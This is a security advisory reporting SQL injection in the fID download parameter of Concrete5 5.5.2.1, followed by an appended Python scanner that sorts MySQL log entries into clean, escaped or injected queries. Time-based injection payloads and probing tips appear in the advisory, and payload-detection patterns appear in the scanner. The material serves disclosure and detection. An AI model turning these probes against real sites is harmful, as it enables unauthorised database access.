[ TITLE ....... ][ Concrete 5.5.2.1 CMS - SQL Injection
[ DATE ........ ][ 22.04.2012
[ AUTHOR ...... ][ http://hauntit.blogspot.com
[ SOFT LINK ... ][ http://www.concrete5.org/
[ VERSION ..... ][ 5.5.2.1
[ TESTED ON ... ][ LAMP
[ -----------------------------------------------------------------------
[
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug :)
[ 4. More...
[--------------------------------------------[
[ 1. What is this?

This is a very nice CMS, you should try it! ;)
[--------------------------------------------[
[ 2. What is the type of vulnerability?

SQL Injection.
[--------------------------------------------[
[ 3. Where is bug :)

The vulnerable parameter is fID, the file identifier passed to the download handler. For example, from the MySQL general query log (several consecutive entries, copied as logged, the last one truncated):

60832 Query insert into DownloadStatistics (fID, fvID, uID, rcID) values (NULL, 0, 1, 0)
FROM Files LEFT JOIN FileVersions on Files.fID = FileVersions.fID and FileVersions.fvIsApproved = 1 WHERE Files.fID = '1 waitfor delay \'0:0:10\'--'
FROM Files LEFT JOIN FileVersions on Files.fID = FileVersio

Reading the log: the INSERT into DownloadStatistics is the download counter being written (fID is NULL because the lookup failed), and the SELECT fragment that follows shows the supplied fID value landing in the WHERE clause of the Files/FileVersions lookup. So the injection point is the parameter that feeds the download statistics: every time a file is downloaded its counter is incremented, and the fID used to look the file up goes into the query.

Two things worth noting about this particular log line before relying on it. WAITFOR DELAY is Transact-SQL and means nothing to MySQL, so a delay-based probe written that way cannot produce a timing difference here; MySQL's own SLEEP() or BENCHMARK() is the equivalent. And the inner quotes appear backslash-escaped in the logged statement (\'0:0:10\'), so this excerpt shows the raw parameter reaching the query text verbatim; whether the value breaks out of the string literal is something to confirm with a single unescaped quote and a MySQL-native time-based or boolean-based probe against the same parameter.

Enjoy.
[--------------------------------------------[
[ 4. More...

- http://hauntit.blogspot.com
- http://www.concrete5.org/
- http://www.google.com
- http://portswigger.net
[
[--------------------------------------------[
[ Ask me about new projects @ mail. ;) ]
[ Best regards
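As an added example for section 3 (this is not part of the original advisory and not Concrete5 code), here is a small Python scanner that applies the check described there to MySQL general-log entries: it separates each logged statement into the text inside single-quoted literals and the text outside them, then looks for injection markers in both. A marker found only inside a literal (with the quotes escaped, as in the advisory's line) means the value reached the query but stayed in string context; a marker found outside any literal means the input broke out of the string. The sample log entries are constructed: the second reproduces the advisory's logged WHERE clause, the third is a hypothetical entry where the quote is not escaped, and the query numbers are arbitrary.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in MySQL general-log style (not a real capture).
# 60833 mirrors the advisory's log line (quotes backslash-escaped by the app);
# 60834 is a hypothetical entry where the supplied quote was NOT escaped.
SAMPLE_LOG = """\
60832 Query\tinsert into DownloadStatistics (fID, fvID, uID, rcID) values (NULL, 0, 1, 0)
60833 Query\tSELECT * FROM Files LEFT JOIN FileVersions on Files.fID = FileVersions.fID and FileVersions.fvIsApproved = 1 WHERE Files.fID = '1 waitfor delay \\'0:0:10\\'--'
60834 Query\tSELECT * FROM Files WHERE Files.fID = '1' AND SLEEP(10)-- '
60835 Query\tSELECT * FROM Files WHERE Files.fID = '42'
"""

# "<id> Query <statement>" lines; other event types (Connect, Quit) are skipped.
LOG_LINE = re.compile(r"^\s*(\d+)\s+Query\s+(.*)$")

# A MySQL single-quoted string literal: backslash escapes or doubled quotes inside.
STRING_LITERAL = re.compile(r"'(?:[^'\\]|\\.|'')*'")

# Markers typical of time-based, union-based and comment-terminated payloads.
# WAITFOR DELAY is T-SQL and is listed only to spot probes in the wrong dialect.
MARKERS = {
    "mysql_sleep": re.compile(r"\bsleep\s*\(", re.I),
    "mysql_benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "tsql_waitfor": re.compile(r"\bwaitfor\s+delay\b", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "comment_terminator": re.compile(r"--"),
}


@dataclass
class Finding:
    query_id: str
    verdict: str                  # "clean", "escaped-in-literal" or "injected"
    outside_markers: list = field(default_factory=list)
    inside_markers: list = field(default_factory=list)


def split_literals(sql):
    """Return (outside, literals): the SQL text with string literals cut out,
    and the list of literal bodies. Text after an unterminated quote counts as
    outside, since the server would not treat it as a string either."""
    outside_parts, literals = [], []
    pos = 0
    for m in STRING_LITERAL.finditer(sql):
        outside_parts.append(sql[pos:m.start()])
        literals.append(m.group(0)[1:-1])
        pos = m.end()
    outside_parts.append(sql[pos:])
    return "".join(outside_parts), literals


def classify_query(query_id, sql):
    """Decide whether payload markers sit in SQL structure or only inside strings."""
    outside, literals = split_literals(sql)
    outside_hits = [name for name, rx in MARKERS.items() if rx.search(outside)]
    inside_hits = [name for name, rx in MARKERS.items()
                   if any(rx.search(lit) for lit in literals)]
    if outside_hits:
        verdict = "injected"            # input altered the statement structure
    elif inside_hits:
        verdict = "escaped-in-literal"  # input reached the query but stayed quoted
    else:
        verdict = "clean"
    return Finding(query_id, verdict, outside_hits, inside_hits)


def scan_general_log(text):
    """Classify every Query entry in a general-log excerpt."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            findings.append(classify_query(m.group(1), m.group(2)))
    return findings


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"{f.query_id}: {f.verdict:19} outside={f.outside_markers} inside={f.inside_markers}")
```

Run against the sample, entry 60833 is reported as escaped-in-literal (the WAITFOR and the trailing comment are inside the quoted value), 60834 as injected (SLEEP() and the comment terminator sit outside any literal), and the other two as clean. On a real general log the same split is what tells a fuzzed-but-escaped parameter apart from a genuine break-out, which is the distinction the advisory's single log line leaves open.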